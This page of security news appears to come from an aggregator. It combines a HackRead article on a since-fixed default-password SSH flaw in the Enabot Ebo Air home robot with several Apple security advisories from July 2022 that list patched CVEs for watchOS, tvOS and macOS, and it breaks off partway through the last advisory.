By Deeba Ahmed
If exploited, the flaw could have allowed an attacker to hijack the device’s camera and microphone to spy…
This is a post from HackRead.com Read the original post: Flaws in Enabot Ebo Air Home Security Robot Allowed Attackers to Spy on Users

****If exploited, the flaw could have allowed an attacker to hijack the device’s camera and microphone to spy on the homeowners.****

Security lab Modux researchers identified a flaw in Enabot’s Ebo Air smart robot, a device designed to entertain your entire family and pets. As per Modux researchers’ findings, attackers could easily hack the smart robot by exploiting the flaw and spying on the occupants/users.

The attacker can record videos, compromise the camera, and communicate with the users via the device’s built-in microphone. All this can happen while the device owners remain unaware of hacking, and the attacker can discreetly monitor the indoor activities.

Image captured by researchers (Image: Modux Labs

**What is the Flaw?**

While testing the Ebo Air smart robot, Modux discovered it was pre-configured with a default admin password. Therefore, an attacker could use the password to connect to the device through the Secure Shell/SSH network communication protocol, which computers use to enable communication.

Once this is done, the attacker can access and exploit almost all functions of the device, from accessing/capturing audio video to conducting surveillance. It is worth noting that the hack could be successful only if the attacker hacks your home Wi-Fi network, which isn’t too difficult considering the poor security mechanisms in routers.

**Risks Associated with the Flaw**

When attackers gain remote control over the device, they can fully control it remotely (from anywhere) anytime. Furthermore, any Ebo Air robot could be exploited with the flaw, whether on sale or in use by homeowners, because the default password was the same.

Another issue is that the device didn’t get wiped entirely after a factory reset, so the users’ passwords would still be accessible even if the device is sold. In that case, the new owner could easily access your home Wi-Fi network and identify your location.

**Current Status of the Flaw**

According to Modux Labs’ blog post, they promptly informed Enabot about the flaw, and the company responded positively. The company fixed the flaw and mitigated the threat by terminating the SSH service and eliminating the chance of an attacker controlling the device.

Moreover, Enabot fixed the incomplete factory data reset issue. However, Ebo Air users can still be at risk unless they update the app and device to install the latest security fixes.

**Lesson Learned**

In conclusion, it is evident that IoT devices are at major risk due to their default credentials. One must be sure to change these credentials after setting up the device. Additionally, it is important to keep an eye on the latest security patches issued by the manufacturer. By doing so, we can help mitigate the risk of our IoT devices being compromised.

**More IoT Security News**

1.  ThroughTek Flaw Exposed Millions of IoT Cameras to Spying
2.  New malware found targeting IoT devices, Android TV globally
3.  Millions of IoT devices, baby monitors open to audio, video snooping
4.  High severity Intel chip flaw left cars, medical and IoT devices vulnerable
5.  Feds Dismantle Russian Rsocks Botnet Powered by Millions of IoT Devices

Flaws in Enabot Ebo Air Home Security Robot Allowed Attackers to Spy on Users

Apple Security Advisory 2022-07-20-6 - watchOS 8.7 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-6 watchOS 8.7

watchOS 8.7 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213340.

APFS  
Available for: Apple Watch Series 3 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may be able to cause kernel code execution  
Description: A buffer overflow issue was addressed with improved  
bounds checking.  
CVE-2022-32788: Natalie Silvanovich of Google Project Zero

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom  
(@jaakerblom)

AppleMobileFileIntegrity  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-32845: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32840: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32810: Mohamed Ghannam (@_simo36)

Audio  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Audio  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32825: John Aakerblom (@jaakerblom)

CoreText  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

File System Events  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

GPU Drivers  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: Multiple out-of-bounds write issues were addressed with  
improved bounds checking.  
CVE-2022-32793: an anonymous researcher

GPU Drivers  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-32821: John Aakerblom (@jaakerblom)

ICU  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: Apple Watch Series 3 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32841: hjy79425575

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32813: Xinru Chi of Pangu Lab  
CVE-2022-32815: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32817: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app with arbitrary kernel read and write capability may be  
able to bypass Pointer Authentication  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)

Liblouis  
Available for: Apple Watch Series 3 and later  
Impact: An app may cause unexpected app termination or arbitrary code  
execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China  
(nipc.org.cn)

libxml2  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

Multi-Touch  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Multi-Touch  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved state  
handling.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Software Update  
Available for: Apple Watch Series 3 and later  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero  
Day Initiative

Wi-Fi  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32847: Wang Yu of Cyberserval

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

configd  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1p  
rhjSsg//XnukSPtKHk58IOSkcWaTk0WdrYv2+dGbdgkcPBgO2ehNQqk1xI3LDHLN  
b6A5MMaoR4ityTEC+i4XFWxVJNfzXFa1SHMiht1uJDtaNCc2F+VIP+EZJx2KYe7H  
O8F0g9lF33hQE3xDjrwtPe+7wYjfzgDX8iCbsfaNDPAWBq0BfNA8/4bv5GzPaPC4  
qcP+W9IRb11yAzlnCEgJNhMB0SLwtzpcUYLKcJbPdilABeYe08CLIIVAw2vKI1Kk  
J7sk/ZiGKnB1ZHa+fl17ahApKkLePnFtHR9rMseEpyRbPa7EvomZxUQoLvbaDf+Q  
gRqtysAw8oxfhetorvDFwAem3eCRdgJ/T/0U6jC+4dfHzVnGxV27K/PgF3GWRDU5  
trPVZ0cu8qdzgNAwSuRHTxTg923FN7cR14NL66TkGZ1d/VKfn1l0h1wctoPOhHPR  
zWJi5P8WbprG1XVWNx+aJYW09VIMsujJrrGQSn78o6gXOR2salEDiCs2JixKZnqK  
CV4+uGQIiE8bD0oA1B1uFQiPx3XtgOY92QQl8Jnn/7Xa6QQ0hq/3NmDN66RzO78S  
I4pH4Vt/L0LNoArGMCrO4URpLiQx5Au0niH5+jbvHyWr1Bm3Y+dMRP1yds3aLQ0Q  
16FIrWStzY+cnmOXQKczTIiaJYuSMjCOQicLuWx/q2ghfLCJ16E=  
=6Uj+  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-6

Apple Security Advisory 2022-07-20-5 - tvOS 15.6 addresses buffer overflow, bypass, code execution, information leakage, out of bounds read, out of bounds write, and spoofing vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-07-20-5 tvOS 15.6tvOS 15.6 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213342.APFSAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32832: Tommy Muir (@Muirey03)AppleAVDAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may be able to cause kernel code executionDescription: A buffer overflow issue was addressed with improvedbounds checking.CVE-2022-32788: Natalie Silvanovich of Google Project ZeroAppleAVDAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom(@jaakerblom)AppleMobileFileIntegrityAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to gain root privilegesDescription: An authorization issue was addressed with improved statemanagement.CVE-2022-32826: Mickey Jin (@patch1t) of Trend MicroAudioAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-32820: an anonymous researcherAudioAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32825: John Aakerblom (@jaakerblom)CoreMediaAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom(@jaakerblom)CoreTextAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may cause an unexpected app termination orarbitrary code executionDescription: The issue was addressed with improved bounds checks.CVE-2022-32839: STAR Labs (@starlabs_sg)File System EventsAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to gain root privilegesDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32819: Joshua Mason of MandiantGPU DriversAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: Multiple out-of-bounds write issues were addressed withimproved bounds checking.CVE-2022-32793: an anonymous researcherGPU DriversAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-32821: John Aakerblom (@jaakerblom)iCloud Photo LibraryAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to access sensitive user informationDescription: An information disclosure issue was addressed byremoving the vulnerable code.CVE-2022-32849: Joshua JonesICUAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.ImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted image may result indisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32841: hjy79425575ImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted file may lead to arbitrarycode executionDescription: A logic issue was addressed with improved checks.CVE-2022-32802: Ivan Fratric of Google Project Zero, Mickey Jin(@patch1t)ImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted image may lead to disclosureof user informationDescription: An out-of-bounds read issue was addressed with improvedbounds checking.CVE-2022-32830: Ye Zhang (@co0py_Cat) of Baidu SecurityKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32813: Xinru Chi of Pangu LabCVE-2022-32815: Xinru Chi of Pangu LabKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: An out-of-bounds read issue was addressed with improvedbounds checking.CVE-2022-32817: Xinru Chi of Pangu LabKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app with arbitrary kernel read and write capability may beable to bypass Pointer AuthenticationDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)LiblouisAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may cause unexpected app termination or arbitrary codeexecutionDescription: This issue was addressed with improved checks.CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China(nipc.org.cn)libxml2Available for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to leak sensitive user informationDescription: A memory initialization issue was addressed withimproved memory handling.CVE-2022-32823Multi-TouchAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A type confusion issue was addressed with improvedchecks.CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)Software UpdateAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A user in a privileged network position can track a user’sactivityDescription: This issue was addressed by using HTTPS when sendinginformation over the network.CVE-2022-32857: Jeffrey Paul (sneak.berlin)WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Visiting a website that frames malicious content may lead toUI spoofingDescription: The issue was addressed with improved UI handling.WebKit Bugzilla: 239316CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.WebKit Bugzilla: 240720CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro ZeroDay InitiativeWi-FiAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to cause unexpected system termination orwrite kernel memoryDescription: This issue was addressed with improved checks.CVE-2022-32837: Wang Yu of CyberservalWi-FiAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may be able to cause unexpected systemtermination or corrupt kernel memoryDescription: This issue was addressed with improved checks.CVE-2022-32847: Wang Yu of CyberservalAdditional recognition802.1XWe would like to acknowledge Shin Sun of National Taiwan Universityfor their assistance.AppleMobileFileIntegrityWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła(@_r3ggi) of SecuRing for their assistance.configdWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła(@_r3ggi) of SecuRing for their assistance.Apple TV will periodically check for software updates. Alternatively,you may manually check for software updates by selecting "Settings ->System -> Software Update -> Update Software."  To check the currentversion of software, select "Settings -> General -> About."All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1prhgqhA//RvdwRWv4x9V+fyJIcdfoFcXnJ/E5rxv6BQjpWnVcFRa/QKVU5lu7AbMkg6R+txpMiG1JAMqAB4oySZMtlxg0RVjCK3vBRy6v61uhBM5IgupHVZeXRVdYNGlJyitKP7fFbYBuZ9+wcXNE8zeKpF+dUsz0T6CNh4bo6kStyBH5RqpWdPmX5XBtwwf7/czmfRLrhqcWdhkXJ99yN+836TFtqnUDddJRCx0DRXLYuZCXTe2QwqY6F7d+JrCOP5XN3WntDeYZ6Yn7OK4a1KWdQ9DaKfbpVU/3iC5gFbwLkejzt7rk7QohxetWPooKkD6VMT+lnAS6jDqlLqnb+JLZKM353VQEW5lvLs2/UO0IqP/dSAJwHopikooKPcs+KegPiZ8O9OEiYBuVAXZiGgQYFhx3eFu+BWoSSsX3JVSsYPQE1ehF8wy5PbjpK9ru7/s9ZpOpl0rTiBUxMc/yTZbJ2BBZf9lMCykhciQ5wZC5tmfELFnhszQEiBM9mN3Kea5jRTobOq8gU/nb4AZbnVFMJ+gX60w8ZlvGI+E+bnEZq+tBlXFHMZ63avjsYarQD+2Gs4FtmeAEc7/vJ8RY3RI4mqu+9rMaxniPjsLCY8Kl5OvSYJrbs4YL+dqxe7Mp20mn2COHtyFEEOoh+NVY1XuzSoDX4TeDBxpuqH5l9MV4TMFUh4M==i68Z-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-5

Apple Security Advisory 2022-07-20-4 - Security Update 2022-005 Catalina addresses code execution, information leakage, null pointer, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-4 Security Update 2022-005 Catalina

Security Update 2022-005 Catalina addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213343.

APFS  
Available for: macOS Catalina  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleMobileFileIntegrity  
Available for: macOS Catalina  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu  
Security, Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32853: Ye Zhang(@co0py_Cat) of Baidu Security  
CVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security

Audio  
Available for: macOS Catalina  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Calendar  
Available for: macOS Catalina  
Impact: An app may be able to access sensitive user information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

Calendar  
Available for: macOS Catalina  
Impact: An app may be able to access user-sensitive data  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2022-32849: Joshua Jones

CoreText  
Available for: macOS Catalina  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

FaceTime  
Available for: macOS Catalina  
Impact: An app with root privileges may be able to access private  
information  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-32781: Wojciech Reguła (@_r3ggi) of SecuRing

File System Events  
Available for: macOS Catalina  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

ICU  
Available for: macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: macOS Catalina  
Impact: Processing an image may lead to a denial-of-service  
Description: A null pointer dereference was addressed with improved  
validation.  
CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2022-32811: ABC Research s.r.o

Kernel  
Available for: macOS Catalina  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32815: Xinru Chi of Pangu Lab  
CVE-2022-32813: Xinru Chi of Pangu Lab

libxml2  
Available for: macOS Catalina  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

PackageKit  
Available for: macOS Catalina  
Impact: An app may be able to modify protected parts of the file  
system  
Description: An issue in the handling of environment variables was  
addressed with improved validation.  
CVE-2022-32786: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Catalina  
Impact: An app may be able to modify protected parts of the file  
system  
Description: This issue was addressed with improved checks.  
CVE-2022-32800: Mickey Jin (@patch1t)

PluginKit  
Available for: macOS Catalina  
Impact: An app may be able to read arbitrary files  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

PS Normalizer  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted Postscript file may result  
in unexpected app termination or disclosure of process memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

SMB  
Available for: macOS Catalina  
Impact: An app may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)

SMB  
Available for: macOS Catalina  
Impact: A user in a privileged network position may be able to leak  
sensitive information  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)

Software Update  
Available for: macOS Catalina  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

Spindump  
Available for: macOS Catalina  
Impact: An app may be able to overwrite arbitrary files  
Description: This issue was addressed with improved file handling.  
CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Spotlight  
Available for: macOS Catalina  
Impact: An app may be able to gain elevated privileges  
Description: A validation issue in the handling of symlinks was  
addressed with improved validation of symlinks.  
CVE-2022-26704: Joshua Mason of Mandiant

TCC  
Available for: macOS Catalina  
Impact: An app may be able to access sensitive user information  
Description: An access issue was addressed with improvements to the  
sandbox.  
CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)  
of Tencent Security Xuanwu Lab (xlab.tencent.com)

Vim  
Available for: macOS Catalina  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating Vim.  
CVE-2021-4136  
CVE-2021-4166  
CVE-2021-4173  
CVE-2021-4187  
CVE-2021-4192  
CVE-2021-4193  
CVE-2021-46059  
CVE-2022-0128

Wi-Fi  
Available for: macOS Catalina  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32847: Wang Yu of Cyberserval

Security Update 2022-005 Catalina may be obtained from the Mac App  
Store or Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuQACgkQeC9qKD1p  
rhiuNw//V3lvbuk3ZcN4l2+dumbidEYnYD+qrrm+V332BNA9zqn9Uyoy1l9mXY32  
qA/UfHpnuZj5F2qjBNinkpV9VlwMZUIZmWfLBrVz3+cF1wrF6RZVFmz05sVsWTCC  
zB7H9eCPQr/afrTgjf2evIsaCZaqveOP7ZVFV3dOEOpzp/hMUYFWF69mEbYfl2Z1  
PlB3bkZPys4fZ3nCq70egWotGl7V4M/9aqGBDQZzAwmcsepeppBaCP1MnDiDiWqA  
6m2jVNDDTP/CasfPt1k3jR3aKf7f+ySZozQLyUyMhRpTLnZ1fpEtD5jjwK/hprKW  
g00gdTOBl7aGAxbKL3xlsxXRGzhzy9n2RVN4duhRKEbDKDShCfRFmCxXGxAGJB7J  
96TqA/wy1s7gnlxNzUfJewJMopr3AU4ffhdyOgKV1Is7eRwAhKYlh3K5T6C28Uuj  
8TXAqY2qwMqs+jIqe3dGEuPBj83tQMD0xukIhzGtuxwoziiPyzSfrgUHvSK8vBYN  
NGGfLdHn8ailAYpnFeRxhImxclr59QddI8uzS/G6O9CLJY0jUh3tjCNC3fjIjS6F  
lD3+P/J/Hf5HFvpvNyw6aJVVYIcGFOQi+RmhVGysMHuGIz4aqc9rTdvbAKdeKpyK  
8p0C6S1/sV+pu7morGBm9aSm/rRyDZSVWSA2l/3fRA9mJmrL8Ao=  
=fcrb  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-4

Apple Security Advisory 2022-07-20-3 - macOS Big Sur 11.6.8 addresses code execution, information leakage, null pointer, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-3 macOS Big Sur 11.6.8

macOS Big Sur 11.6.8 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213344.

APFS  
Available for: macOS Big Sur  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: This issue was addressed with improved checks.  
